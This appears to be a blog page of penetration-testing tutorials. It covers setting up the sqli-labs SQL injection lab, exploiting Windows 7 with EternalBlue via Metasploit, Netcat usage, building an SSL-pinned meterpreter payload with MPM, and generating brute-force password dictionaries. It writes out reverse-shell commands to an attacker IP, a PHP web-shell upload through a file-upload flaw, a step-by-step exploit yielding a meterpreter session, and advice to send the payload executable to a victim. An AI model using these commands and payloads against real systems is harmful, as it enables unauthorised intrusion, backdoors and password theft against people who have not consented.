Showing posts with label Penetration Testing. Show all posts

How to set up an SQLi Lab in Kali

Hello everyone. Along with the joy of having a new Kali version, a few of us are having a hard time setting up the Dhakkan (Audi-1) SQL injection lab series on our Kali machines.

So today we'll learn how to set up the Dhakkan lab (one of the best labs I have seen for practising and understanding SQL injection) on the latest Kali.
Download from here

Q - Why is it not as simple as it was in older versions of Kali?
Ans - The latest version of Kali ships a PHP version that no longer supports the old MySQL functions; it supports the MySQLi functions instead.

The MySQLi extension (MySQL Improved) is a relational database driver used mainly in the PHP programming language.

So we have two ways to set it up:

1- Downgrade your PHP version to 5.xx
2- Change the code of the original Dhakkan lab to make it work with the latest Kali.
We'll change the code of the labs.

Q- How did I find out that this is the issue?
Ans - When I set up my lab and browsed to it, I saw that I was unable to set up the required database; see the screenshot below.

In the above screenshot look at the URL. So now I know something is wrong in setup-db.php, so I tried to run this specific file on my Kali; see the screenshot.

After googling the error I learned that I have to replace mysql_connect() with mysqli_connect().

After making this change, when I ran setup.php again I came across a new error; see the screenshot.

So I replaced mysql_query($sql) with mysqli_query($con, $sql)
($con is the connection link we made to our database). If you don't know PHP, don't worry: simply replace mysql_query($sql) with mysqli_query($con, $sql).
This is how I debugged the issue.
Now I am summarizing the changes that I made, and that you have to make, to set up your lab.
Use Ctrl+F and the replace-all feature to make the changes quickly.
You have to make the changes in index.php of ALL lessons, in the other PHP files in the lessons, and in all PHP files in the sql-connections folder.
(Or you can contact me to get the edited lab.)
Replace                               By
mysql_connect(...)                    mysqli_connect(...)
mysql_query($sql)                     mysqli_query($con, $sql)
mysql_fetch_array($result)            mysqli_fetch_array($result, MYSQLI_BOTH)
mysql_fetch_array($result1)           mysqli_fetch_array($result1, MYSQLI_BOTH)
mysql_real_escape_string($value)      mysqli_real_escape_string($con, $value)
mysql_select_db($dbname, $con)        mysqli_select_db($con, $dbname)
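The replace-all pass above, as an added example (not part of the post or of sqli-labs) written as a script: it applies the table to every PHP file under the lab folder. It assumes the lab keeps its connection link in a variable named $con, as the post does.

```python
# Added example, not part of the post or of sqli-labs: apply the post's
# mysql_* -> mysqli_* replacement table to every PHP file under the lab folder,
# so the Ctrl+F replace-all pass need not be repeated by hand in each lesson.
import re
from pathlib import Path

CON = "$con"  # the connection link variable the lab files use

# One (pattern, replacement) per row of the table. Arguments are captured with
# a flat group, enough for the lab's simple calls; a nested call such as
# mysql_query(f($x)) is left untouched for manual review.
RULES = [
    (r"\bmysql_connect\(", "mysqli_connect("),
    (r"\bmysql_select_db\(\s*([^,()]+?)\s*,\s*([^()]+?)\s*\)", r"mysqli_select_db(\2, \1)"),
    (r"\bmysql_select_db\(\s*([^,()]+?)\s*\)", rf"mysqli_select_db({CON}, \1)"),
    (r"\bmysql_query\(\s*([^()]+?)\s*\)", rf"mysqli_query({CON}, \1)"),
    (r"\bmysql_fetch_array\(\s*([^,()]+?)\s*\)", r"mysqli_fetch_array(\1, MYSQLI_BOTH)"),
    (r"\bmysql_real_escape_string\(\s*([^()]+?)\s*\)", rf"mysqli_real_escape_string({CON}, \1)"),
    (r"\bmysql_error\(\s*\)", f"mysqli_error({CON})"),
    (r"\bmysql_close\(", "mysqli_close("),
]

def port_mysql_to_mysqli(php_source: str) -> str:
    """Rewrite every legacy mysql_* call in php_source. The patterns never match
    mysqli_* names, so running the function twice changes nothing."""
    for pattern, replacement in RULES:
        php_source = re.sub(pattern, replacement, php_source)
    return php_source

def port_tree(root: str) -> list[str]:
    """Rewrite in place every .php file below root (index.php of each lesson,
    the other lesson files and the sql-connections folder); return what changed."""
    changed = []
    for path in Path(root).rglob("*.php"):
        original = path.read_text(encoding="utf-8", errors="surrogateescape")
        ported = port_mysql_to_mysqli(original)
        if ported != original:
            path.write_text(ported, encoding="utf-8", errors="surrogateescape")
            changed.append(str(path))
    return changed

# Constructed fragment in the style of a lesson's index.php (not the lab's real file).
SAMPLE = r"""<?php
$con = mysql_connect($host, $dbuser, $dbpass);
mysql_select_db($dbname, $con);
$id = mysql_real_escape_string($_GET['id']);
$sql = "SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result = mysql_query($sql) or die(mysql_error());
$row = mysql_fetch_array($result);
"""

if __name__ == "__main__":
    print(port_mysql_to_mysqli(SAMPLE))
```

Run port_tree("/var/www/html/sqlilabs") after copying the lab into place; check the changed files in a lesson that errors afterwards, since only flat one-argument calls are rewritten.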

After making the above changes, copy the complete sqli-labs folder into the /var/www/html folder of Kali.

Now open the Kali terminal and move to this folder using the command "cd /var/www/html".

Now give permissions to the sqlilabs folder using the command "chmod 777 sqlilabs" (world-writable is acceptable only because this is a throwaway lab VM).

Now move into the sqlilabs folder using the command "cd sqlilabs" and give permissions to all files and folders in it using the command "chmod 777 *".

Now your lab is ready to use. You can access it from your browser at http://<IP of your Kali machine>/sqlilabs.

Click on "Setup/reset Database for labs".

Database set. Now practise, enjoy, and use your skills to help organizations secure their apps and applications from hackers. Don't test it on sites for which you don't have written permission to do so; it is illegal, and you may end up behind bars and ruin your career.

We are very thankful to Audi-1 (aka Dhakkan) for creating such an interesting and awesome environment for us to understand and practise SQL injection.

Exploit Windows PC using EternalBlue SMB Remote Windows Kernel Pool Corruption

This module is a port of the Equation Group ETERNALBLUE exploit, part of the FuzzBunch toolkit released by the Shadow Brokers. There is a buffer overflow in a memmove operation in Srv!SrvOs2FeaToNt. The size is calculated in Srv!SrvOs2FeaListSizeToNt, with a mathematical error where a DWORD is subtracted into a WORD. The kernel pool is groomed so that the overflow is well laid out to overwrite an SMBv1 buffer. The actual RIP hijack is later completed in srvnet!SrvNetWskReceiveComplete. This exploit, like the original, may not trigger 100% of the time and should be run continuously until triggered. It seems like the pool will get hot streaks and need a cool-down period before the shells rain in again.

Let's start!!!
Attacker: Kali Linux
Target: Windows 7

Open the terminal in your Kali Linux and type msfconsole to load the Metasploit framework.

msf > use exploit/windows/smb/ms17_010_eternalblue
msf exploit(ms17_010_eternalblue) > set rhost <target IP>
msf exploit(ms17_010_eternalblue) > set
msf exploit(ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
msf exploit(ms17_010_eternalblue) > exploit

From the screenshot you can see we have got a meterpreter session after the buffer overflow was exploited by overwriting the SMBv1 buffer.
meterpreter > sysinfo

Netcat Tutorials for Beginners

In the field of hacking, the most utilized and powerful tool used by attackers is popularly known as "Netcat", a computer networking utility for reading from and writing to network connections using TCP or UDP. Netcat is designed to be a dependable back-end that can be used directly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and investigation tool, since it can create almost any kind of connection its user could need and has a number of built-in capabilities.

Netcat is at the same time very easy and multipurpose; it's like trying to explain everything you can do with your Swiss Army knife.
For example:

· Banner grabbing
· Bind shell (backdoor)
· Chatting
· File uploading and downloading
· Port scanning
· Port knocking
· Port forwarding
· Show web server HTTP file contents

There are many options in netcat to extend what it can do; you can see them by typing nc -h in the terminal of Kali Linux. Before getting into its working details, be aware that here we used two systems: one as the attacker and another as the target system.
Let's begin

Port Knocking

Open the terminal of your Kali Linux and type the following command, which contains the target's IP and the target port number.
nc <target IP> 2222

When the given command is executed it reveals the service running behind the port by knocking on it; from the image below you can observe that port 2222 is open for SSH.

Reverse Shell

Mainly, attackers use netcat as a backdoor for gaining unauthorized access to a target's system. In this the attacker starts a listener on a (random) port, then scans for any vulnerable target.

nc -lvp 4444

The above command waits for a reverse connection from the victim's system.
In the given screenshot you can see the running website is suffering from an OS command injection vulnerability; now use nc -e /bin/bash <attacker IP> 4444 to establish a connection between the victim's and the attacker's systems, which allows unauthorized access by creating a backdoor.

Here you can see that we (the attacker) have successfully accessed the victim's shell through netcat.

Netcat as a Backdoor
Download netcat.exe for Windows and type the following command on the Windows client:
nc.exe <attacker IP> 4444 -e cmd.exe

From the given screenshot you can see that the attacker successfully gets connected with the Windows client through netcat, listening with:
nc -lvp 4444

File Upload Exploitation
We will look at how an attacker can exploit a file upload vulnerability through a netcat shell. From the given image it is clear that the targeted web server allows its clients to upload an image.

For the upload we use php-reverse-shell.php instead of an image; this is a PHP backdoor. Open this web shell for editing and set the listener IP, i.e. your Kali Linux IP, and then start netcat with the following command, which will wait for a reverse connection from the victim's system.
nc -lvp 1234

Now upload your PHP backdoor to the web server and execute the file, which will connect the victim's system back to the attacker's machine.

Hence you can see the attacker successfully gained unauthorized access through a netcat shell.

HTTP Request

Use Netcat to fetch web page information from a web server. With Netcat you can retrieve the full HTTP header, so you can see which site is running on the web server. Now type the following command, which makes a connection to port 80.

nc <target IP> 80

From the screenshot you can read the details of the HTTP header of the targeted website.

Port Scanning
Netcat can also scan TCP and UDP ports, hence it can be used in place of Nmap; it tells us about the open and closed ports of the targeted IP.

The following command takes the target IP and port range and uses these options:

-z: zero-I/O mode [used for scanning]
-w: timeout for connects and final net reads
-v: verbose
-l: listen mode, for inbound connects
-n: numeric-only IP addresses

From the resulting image you can see the open ports with their running services.

Chatting
Netcat can also be used for chatting between two systems. We need to set up Netcat to listen on a specific port on one system and connect to that address and port from the other.

nc -lvp 5678

nc <listener IP> 5678
How are you

File Transfer
As you know, on Windows we have downloaded the netcat.exe file; now here I use it for uploading a text file t.txt to the targeted system through a specific port.

nc <receiver IP> 5555 < t.txt

The receiver downloads that t.txt file by listening on the same port number (start the listener first), which establishes the connection between both systems.
nc -lvp 5555 > /root/Desktop/t.txt

Exploit Remote PC with SSL Certified Meterpreter Payload using MPM

In this article you will learn how an attacker can generate an SSL certificate for an exe or bat payload so that he can establish a connection with the host through a meterpreter session.

A firewall doing SSL inspection intercepts the network traffic and verifies trusted certificates to insert itself as a trusted third party into the session between the client and the server. When the client begins an SSL session with the server, the firewall captures the client's SSL request and forwards it to the server. The server sends a certificate for the client that is captured by the firewall. If the server certificate is signed by a CA that the firewall trusts, the firewall generates a duplicate of the server certificate signed by its Forward Trust certificate and forwards that certificate to the client to authenticate. MPM allows you to secure your staged/stageless Meterpreter connection by having it check the certificate of the handler it is connecting to.

Open the terminal in your Kali Linux and type the following to download it.

Once it is downloaded, run the program file and follow the steps given below.

Press enter to continue.

A prompt will open in which you have to choose an option for building the certificate; from the given screenshot you can read that I chose "impersonate domain".

We start by generating a certificate in PEM format; once the certs have been created we can create an HTTP, HTTPS or EXE payload for it and give it the path of the PEM certificate to be used to validate the connection.

After that another prompt will open in which you are asked to enter the domain name for which the SSL certificate will be generated.

To have the connection validated we need to tell the payload what certificate the handler will be using, by setting the path to the PEM certificate in the HANDLERSSLCERT option; then we enable checking of this certificate by setting stagerverifysslcert to true.

PEM is a widely used encoding format for security certificates. Its syntax and content are defined by the X.509 v3 standard for digital certificates, specified in IETF RFC 5280. The main file extensions are .pem, .crt and .ca-bundle. A PEM certificate is a base64 (ASCII) encoded block of data encapsulated between begin and end marker lines.
In the next prompt choose the payload category for auto-building the payload; from the given list I chose stageless (payload.exe).

Once the payload is created we need to create a handler to receive the connection, and again we use the PEM certificate so the handler can use the SHA1 hash for validation. Just like with the payload, we set the parameters HANDLERSSLCERT with the path to the PEM file and stagerverifysslcert to true.
We can see the stager doing the validation when we receive a session back.
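The validation described above, reduced to its core as an added example (this is not MPM's or Metasploit's code): the PEM block is decoded to DER, its SHA1 fingerprint is the pin, and the presented certificate is accepted only if its fingerprint matches. The certificate bytes are a constructed stand-in, not a real X.509 structure.

```python
# Added example (not MPM's or Metasploit's own code): the check that
# stagerverifysslcert asks the stager to perform. The handler side derives a
# SHA1 fingerprint from the PEM in HANDLERSSLCERT; the payload side recomputes
# the fingerprint of whatever certificate it is shown and compares.
import base64
import hashlib
import hmac
import re

BEGIN = "-----BEGIN CERTIFICATE-----"
END = "-----END CERTIFICATE-----"

def pem_to_der(pem_text: str) -> bytes:
    """DER bytes of the first CERTIFICATE block in pem_text: the text between
    the markers is base64 of the DER encoding, wrapped at 64 columns."""
    match = re.search(re.escape(BEGIN) + r"(.*?)" + re.escape(END), pem_text, re.S)
    if match is None:
        raise ValueError("no CERTIFICATE block found")
    body = "".join(match.group(1).split())  # drop the line breaks
    return base64.b64decode(body, validate=True)

def sha1_fingerprint(der: bytes) -> str:
    """Fingerprint in the colon-separated upper-case form tools display."""
    digest = hashlib.sha1(der).hexdigest().upper()
    return ":".join(digest[i:i + 2] for i in range(0, len(digest), 2))

def pin_from_pem(pem_text: str) -> str:
    """Handler side: the value baked into the payload from HANDLERSSLCERT."""
    return sha1_fingerprint(pem_to_der(pem_text))

def certificate_matches_pin(presented_der: bytes, pinned_fingerprint: str) -> bool:
    """Payload side: accept only if the presented certificate's fingerprint
    equals the pinned one; compare_digest avoids a timing side channel."""
    return hmac.compare_digest(sha1_fingerprint(presented_der), pinned_fingerprint)

def der_to_pem(der: bytes) -> str:
    """Wrap DER bytes in PEM armour (64-column base64 between the markers)."""
    b64 = base64.b64encode(der).decode("ascii")
    lines = [b64[i:i + 64] for i in range(0, len(b64), 64)]
    return "\n".join([BEGIN, *lines, END]) + "\n"

# Constructed stand-in for a handler certificate: not real X.509 bytes; the
# pinning logic only needs the raw DER blob and its hash.
HANDLER_DER = b"\x30\x82\x01\x00" + bytes(range(256))
HANDLER_PEM = der_to_pem(HANDLER_DER)

if __name__ == "__main__":
    pin = pin_from_pem(HANDLER_PEM)
    print("pinned SHA1:", pin)
    print("genuine handler accepted:", certificate_matches_pin(HANDLER_DER, pin))
    tampered = HANDLER_DER[:-1] + b"\x00"
    print("other certificate accepted:", certificate_matches_pin(tampered, pin))
```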

Enter LHOST (attacker's IP).

Similarly, give any random port for the reverse connection from the host system and click OK.
Enter lport 8888

Again a list of payloads will open; from that prompt choose the desired payload, which will generate the payload for the attack.

This will configure all settings and start the multi handler by launching the Metasploit framework.

When you move inside the output folder you will find two files: one for the exe payload and another for the .pem certificate. Now make your effort to share the exe file with your victim and wait for the session to be established through meterpreter.

On the other hand you can compare the .pem certificate with an original certificate signed by a CA; if you observe the image below you can read the certificate details, which look similar to those of CA-signed certificates.

Hence you can see I have successfully established the meterpreter session with the victim's system.
Try it by yourself!!!

5 Ways to Create Dictionary for Bruteforcing

We live in the digital era, and in the world of technology everything is password protected. There are many ways to crack a password, such as social engineering, trial and error, etc., but the two most successful methods of password cracking are the dictionary attack and brute force. Both of them have their perks and disadvantages. In today's article we will focus on the dictionary attack, as it comes in handy and is the best method to crack a password.

Dictionary attack: A dictionary attack is an attempted entry into a digital system which uses a precompiled list of possible passwords rather than entering them one at a time. Basically, it is an evolved and advanced form of trial and error, as it brings results fast and is efficient. I am sure there are many ways to build a dictionary, but I am going to give you the five best ones.

The first is Crunch. The best thing about crunch is that you can use it both offline and online. It generates a wordlist according to your requirements. You give it the maximum and minimum length of the password and a character set which you want it to use while creating your dictionary, and crunch will create your dictionary with your requirements as its priority. Hence, a dictionary will be created with all the possible combinations.

Now let's see how to use it. Observe its syntax first:
crunch <min> <max> <charset> -t <pattern> -o <path>
crunch -> crunch is the keyword which tells the system to use this tool.
<min> -> here you specify the minimum length of characters you want.
<max> -> here you specify the maximum length of characters.
<charset> -> here you specify the characters you want it to use while creating the dictionary.
-t <pattern> -> this is optional, but here you can specify the pattern in which you want your character set to be.
-o <path> -> here you give the path where you want your dictionary file to be saved.
For instance, open the terminal of Kali and type:

crunch 3 4 ignite -o /root/Desktop/dict.txt

Now the above command will create a dictionary with all the possible combinations of the letters of the word ignite, with lengths from 3 to 4 characters. The file will be saved in text form on the Desktop. The same is shown in the image below:

Let's now read the dict.txt file, and for that type:
cat dict.txt
All the words will be displayed in the following manner:

The next way is by using Cewl. Cewl works somewhat like John the Ripper and is written in Ruby. When targeting people of the corporate sector or business world, this is the tool for you. As you all know, it is in the human psyche to use words significant to them and which occur in their day-to-day life. Cewl works on the URL you provide it. It takes that URL and crawls it to a depth of 2 links (by default; you can increase or decrease the depth too) and collects every word which has the possibility of being a password. With all these words it generates a wordlist for you to use as your dictionary in a dictionary attack. Let's observe its syntax:

· cewl <URL> -d <depth> -w <path>
· cewl -> indicates the tool which is being used
· <URL> -> here give the URL that you want to use as the foundation of your dictionary.
· -d <depth> -> here, give the number of links you want it to go through while creating your dictionary.
· -w <path> -> here, give the path where you want to store all the possible passwords.
· For example, in the terminal of Kali type:

cewl <target URL> -d 2 -w /root/Desktop/dict.txt

The above command will create a dictionary file using the words from the URL.

Let's look at the dictionary file it just created, and for that type:

cat dict.txt

All the words will be displayed in the following manner:

Our next way is using a third-party tool, i.e. CUPP. The previous tools were pre-installed, but you will have to install this one on your own. To install it please type:

CUPP is developed in Python and makes a very personalized tool when it comes to password cracking. Studies show that when setting up a password, humans show a similar pattern: they tend to personalize the password by adding their date of birth, anniversary date, pet's name, etc., and CUPP focuses on this weakness and helps to crack passwords effectively. Before creating a wordlist, it will ask you for the required information about your target, and it will create the wordlist from that information. Now, let's study how it works step by step. Initiate CUPP first by typing:
./cupp.py -i
Once initiated it will ask you for information about your target, as shown in the image:

Give the required information and your wordlist will be generated as follows:

The next tool is Pydictor. This is a special tool as it is the only one here that creates the wordlist both in normal words and in base64 encoding. So if someone is smart enough to keep a safe password, this tool will help you with it. Pydictor is written in Python. There are two methods to create a wordlist with this tool: one creates a normal wordlist, the other creates the wordlist in base64 form. We will try both methods. But first things first: this is a third-party tool, so we will have to install it, and for that please type:
git clone <pydictor repository URL>

Once the tool is installed and ready to use, give it instructions on the basis of what you want it to generate the wordlist from. Understand the syntax first:
./pydictor.py --len <min> <max> -base d -o <path>
· ./pydictor.py -> initiates the tool
· --len -> indicates the length of characters
· <min> -> here, give the minimum length of characters
· <max> -> here, give the maximum length of characters
· -o -> indicates the path
· <path> -> here, give the path where you want your wordlist to be saved
Let's give the command to generate the wordlist now:
./pydictor.py --len 5 5 -base d -o /root/Desktop/dict.txt

Let's read the file created to have a look at the words it has generated. For that type:
cat dict.txt/BASE_5_5_d_071743.txt

The other method using the same tool gives us passwords in base64 encoding. Let's study the syntax first:
./pydictor.py --len <min> <max> -base d --encode <encoding> -o <path>
· ./pydictor.py -> initiates the tool
· --len -> indicates the length of characters
· <min> -> here, give the minimum length of characters
· <max> -> here, give the maximum length of characters
· --encode -> indicates the type of encryption/encoding
· <encoding> -> here, give the type of encoding you want
· -o -> indicates the path
· <path> -> here, give the path where you want your wordlist to be saved
Let's give the command to generate the wordlist:
./pydictor.py --len 5 5 -base d --encode b64 -o /root/Desktop/dict.txt

The above command will generate the wordlist in base64; let's have a look at it:
cat dict.txt/BASE_5_5_d_070433.txt

The last tool is Dymerge. Dymerge is an interesting and powerful tool written in Python. Basically, what dymerge does is take the previously made dictionaries and merge them into a single one, so all the dictionaries can be used in one go while you sit back and relax. You can merge any number of dictionaries, either default ones or custom-made. This is again a third-party tool, so let's install it first:
git clone <dymerge repository URL>

Let's understand its syntax:
python dymerge.py <dictionary1> <dictionary2> -s -o <path>
· python dymerge.py -> initiates the tool
· <dictionary1> -> here, give the path of the first dictionary you want to merge
· <dictionary2> -> here, give the path of the second dictionary you want to merge
· -o -> indicates the path where the resulting wordlist will be saved
· <path> -> here, give the path where the final wordlist will be saved
Now that we have understood the syntax, let's try the command:
python dymerge.py /root/Desktop/digit.txt /root/Desktop/words.txt -s -o /root/Desktop/dict.txt
Here I have taken two wordlists (you can take more), where one contains numbers and the other contains letters, and merged them into one, so you can use multiple dictionaries at the same time.

Let's have a look at the dictionary it has created:
cat dict-1.txt
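The crunch step ("crunch 3 4 ignite") and the dymerge step above, written out in Python as an added example (this is not crunch's or dymerge's code) so the size of the generated list can be checked before running a long job. Repeated characters in the charset (the two i's in "ignite") are collapsed here; that is this example's own choice, since the post does not say how crunch treats them.

```python
# Added example (not crunch's or dymerge's code): the two operations the post
# drives from the shell. crunch_words() is the "crunch <min> <max> <charset>"
# case; merge_wordlists() is the dymerge case. Duplicate charset characters are
# collapsed here (this example's choice; the post does not say what crunch does).
from itertools import product
from pathlib import Path
from typing import Iterable, Iterator

def unique_chars(charset: str) -> str:
    """Charset with repeats removed, first occurrence wins (order kept)."""
    return "".join(dict.fromkeys(charset))

def crunch_words(min_len: int, max_len: int, charset: str) -> Iterator[str]:
    """Every string of length min_len..max_len over charset, shortest first,
    last position varying fastest (the order crunch prints)."""
    if min_len < 1 or max_len < min_len:
        raise ValueError("need 1 <= min_len <= max_len")
    chars = unique_chars(charset)
    for length in range(min_len, max_len + 1):
        for combo in product(chars, repeat=length):
            yield "".join(combo)

def crunch_count(min_len: int, max_len: int, charset: str) -> int:
    """Size of the wordlist without materialising it: sum of |charset|^n.
    Shows how quickly the candidate space grows with each extra character."""
    n = len(unique_chars(charset))
    return sum(n ** length for length in range(min_len, max_len + 1))

def merge_wordlists(*lists: Iterable[str]) -> list[str]:
    """Union of several wordlists: blank lines dropped, first occurrence kept,
    so digit.txt and words.txt become one list without repeats."""
    seen: dict[str, None] = {}
    for words in lists:
        for word in words:
            word = word.rstrip("\r\n")
            if word:
                seen.setdefault(word, None)
    return list(seen)

def merge_files(output: str, *paths: str) -> int:
    """dymerge-style: merge the files at paths into output; return the word count."""
    merged = merge_wordlists(*(Path(p).read_text().splitlines() for p in paths))
    Path(output).write_text("\n".join(merged) + "\n")
    return len(merged)

if __name__ == "__main__":
    # The post's "crunch 3 4 ignite" case: 5 distinct letters, lengths 3 and 4.
    print(crunch_count(3, 4, "ignite"))  # 750
    print(list(crunch_words(3, 4, "ignite"))[:3])  # ['iii', 'iig', 'iin']
    print(merge_wordlists(["123", "456", ""], ["abc", "123"]))  # ['123', '456', 'abc']
```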